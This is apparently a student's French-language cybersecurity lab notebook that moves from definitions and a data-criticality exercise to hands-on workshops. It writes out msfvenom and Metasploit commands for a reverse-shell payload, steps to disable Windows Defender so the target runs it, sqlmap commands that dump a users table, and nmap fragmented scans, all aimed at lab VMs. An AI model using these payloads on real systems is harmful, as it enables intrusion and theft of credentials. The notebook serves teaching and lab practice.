RÉPUBLIQUE DU SÉNÉGAL
Un peuple, Un but,Une foi
MINISTERE DE L’EDUCATION NATIONALE,
DIRECTION DE L’ENSEIGNEMENT SUPERIEUR
Ecole Supérieure de Technologie et de Management de Dakar
Bloc_note _securité
Initialisation et prise en main du laboratoire de sécurité
KIFALA MAKELE Gerald
Cybersecurité
Définition
=> la cybersécurité n’est autre que la protection des individus, des sociétés et des
organisations contre la cyberrisques selon la norme ISO/IEC TS 27100, article [Link] 2
=> cybersécurité est incluse dans le système d’information
=> différences entre la sécurité informatique et la sécurité des systèmes d’informations
= car tout attaque qui touche au traitement des données n’est pas forcément un cyber
sécurité
Sécurité informatique : Concerne la protection des systèmes informatiques, y
compris le matériel, les logiciels et les données contre les accès non autorisés, les
cyberattaques, et autres menaces.
Sécurité des systèmes d'information : Va au-delà de la sécurité informatique en
englobant non seulement la protection des systèmes informatiques, mais aussi les
processus, les politiques, et la gestion des informations sensibles de l'organisation. Elle
inclut également la sécurité physique, la gestion des risques, la conformité, et la
continuité des opérations.
Ainsi, la sécurité informatique est un sous-ensemble de la sécurité des systèmes d'information,
qui a une portée plus large et englobe la sécurité globale de l'information dans une
organisation.
= le triangle de base de la cybersécurité
Confidentialité
Intégrité Disponibilit
é
Confidentialité : Les information ne sont accessible qu’a une certaine entité
REDIGER PAR GERALD MAKELE I
=> Nous voyant que la cybersécuté contient : la sécurité d’interne, sécurité de web, sécurité
des réseaux, sécurité cloud, sécurité point terminaux, sécurité des données…ect
=> le niveau de sécurité est proportionnel au périmètre que l’on doit sécuriser
exercice n°1:
Identifier les données que nous avons sur la machine, téléphone et autres selon le niveau
de criticité….…ect
1er cas,
= Pour téléphone
Donnée CRITIQUES Données ELEVES INTERMEDIAIRE FAIBLE
Wave Facebook
Whatsapp
Explorateur de
fichier
Contact
Message
gmail
2eme cas
= Pour l’ordinateur
D. CRITIQUE D. ELEVE [Link] FAIBLE
Explorateur des Whatsapp
fichiers
Lindekin Facebook
Machines Virtuelles
REDIGER PAR GERALD MAKELE II
=>système d’information : un ensemble des bien matériel immatériel et des bien appartenant à
une juridiction.
=> cybercriminalité -----→
=> b
============= EXERCICE sur Vulnerabilité=============
Atelier 2 : Attaques des vulnerabilites web
Outils : on a besoins de la machine virtuelle kali linux et dans cette machine on auras owasp
Zap = Zaproxy et SQL map (Kali linux {owasp zap = zaproxy , sqlmap} )
Owasp Broken app
Etape1 : Effectuer une analyse zaproxy
a Lancer VM owap brokenapp et copier son adresse ip
b Sur kali lancer le terminal et faites la commande Sqlmap -u url --dbs
Etape 2 : Exercice d’application
a Effectuer un test sur les applications selectionnes de owasp broken app
b Effectuer des attaques sur
• [Link]
• [Link]
Atelier 3 : Attaque linux
Outils :Kali linux
{mesfconsole, msfvenom}
Etape1 : Creation de virus Linux et windows
Ouvrir le terminal en mode root
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=@ipkali LPORT=22 -f elf -o
/var/www/html/[Link]
service apache2 restart
msfconsole -q
msf6> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
PAYLOAD => linux/x86/meterpreter/reverse_tcp
REDIGER PAR GERALD MAKELE III
msf6 exploit(multi/handler) > set LHOST [Link]
LHOST => [Link]
msf6 exploit(multi/handler) > set LPORT 2
LPORT => 2
msf6 exploit(multi/handler) > exploit
=======> verifions si le ping passe entre les deux machines (windows vers kali)
=======> De kali linux vers windows
REDIGER PAR GERALD MAKELE IV
=========> on tape ceci sur le navigateur de la machine cible [Link]/[Link]
NB : ici l’adresse IP de la machine kali linux est [Link]
=======> Desactiver les pare-feu dans Sécurité Windows > Pare-feu et protection du
réseau
REDIGER PAR GERALD MAKELE V
=======> Désactiver le Pare-feu Windows Defender > Activer et Désactiver le Pare-feu
Windows Defender
REDIGER PAR GERALD MAKELE VI
========> cliquez sur la barre de recherche windows : sécurité Windows > Contrôle des
applications et du navigateur > Paramètres de protection fondé sur la réputation vous
allez aboutir à cette capture et de là vous desactiver tout ce qui ya là
========> Une fois que tous les pare-feu sont désactivés vous verrez que le fichier
télécharger (le virus ) sera exécutable
REDIGER PAR GERALD MAKELE VII
=======> Et une fois que le fichier est exécutable alors depuis la machine kali linux vous
aurons le conrole de la machine windows
======> nous pouvons verifier cette intruisons avec ses commandes
REDIGER PAR GERALD MAKELE VIII
======> Sur la machine windows nous avons
=====> Nous pouvons également voir cela sur la machine kali linux par la commande cd /
REDIGER PAR GERALD MAKELE IX
=======> Créons un dossier dans windows au niveau de la racine au nom de
« PREUVE_VISIBLE » et essayons de voir ce dossier à l’emplacement créer
======> Voyons cela sous kali linux la machine de contrôle
NB : On voit bien comment ce dossier à été creé et se trouve à la 5eme place dans l’ordre des
dossier . On peut faire plusieurs action si on veut bien depuis la machine kali linux
=======> On peut egalement voir le nom de user de cette machine windows
REDIGER PAR GERALD MAKELE X
NB : Ici on voit le nom c’est gerald
=======> On peut se deplacer dans le dossier gerald > puis Desktop ensuite créé un dossier
en etant sur kali linux et voir cela sur le bureau la machine Windows
======> Voyant cela sur windows
REDIGER PAR GERALD MAKELE XI
1. sqlmap -u [Link] --dbs
Command Breakdown:
sqlmap: Le programme utilisé pour tester et exploiter les vulnérabilités SQL.
-u [Link] Spécifie l'URL cible
avec un point d'injection possible (id=%27 indique une tentative d'injection SQL).
--dbs: Cette option demande à sqlmap de lister toutes les bases de données présentes sur
le serveur.
Elle tente de détecter une injection SQL sur le paramètre id de l'URL donnée et, si une
vulnérabilité est trouvée, elle récupère la liste des bases de données disponibles sur le serveur.
2. sqlmap -u [Link] -D bricks --
tables
Command Breakdown:
-D bricks: Spécifie le nom de la base de données sur laquelle travailler (dans ce cas,
bricks).
REDIGER PAR GERALD MAKELE XII
--tables: Cette option demande à sqlmap de lister toutes les tables dans la base de
données spécifiée (bricks).
Ce que fait cette commande :
Après avoir identifié la base de données bricks avec la commande précédente, celle-ci
liste toutes les tables présentes dans cette base de données.
3. sqlmap -u [Link] -D bricks -T
users --column
Command Breakdown:
-T users: Spécifie la table users dans la base de données bricks.
--column: Cette option demande à sqlmap de lister toutes les colonnes de la table
spécifiée (users).
Ce que fait cette commande :
Elle identifie et liste toutes les colonnes dans la table users de la base de données bricks,
fournissant une vue détaillée de la structure de la table.
4. sqlmap -u [Link] -D bricks -T
users --dump
Command Breakdown:
--dump: Cette option demande à sqlmap d'extraire toutes les données de la table
spécifiée.
Ce que fait cette commande :
Elle extrait toutes les données de la table users de la base de données bricks. Cela inclut
généralement toutes les informations stockées dans cette table, telles que les noms
d'utilisateurs, les mots de passe (cryptés ou non), et d'autres informations sensibles.
502 nmap -sS -f @IP_kali
503 nmap -f @IP_kali
496 sudo apt install flameshot\n
REDIGER PAR GERALD MAKELE XIII
====> Cette commande affiche l'utilisation de l'espace disque dans le répertoire /var, en ne
montrant que les répertoires de premier niveau. Les résultats sont triés par taille en ordre
décroissant et limités aux 20 premières lignes.
du -h /var/lib --max-depth=1 | sort -hr | head -n 20
Conclusion
REDIGER PAR GERALD MAKELE XIV
REDIGER PAR GERALD MAKELE XV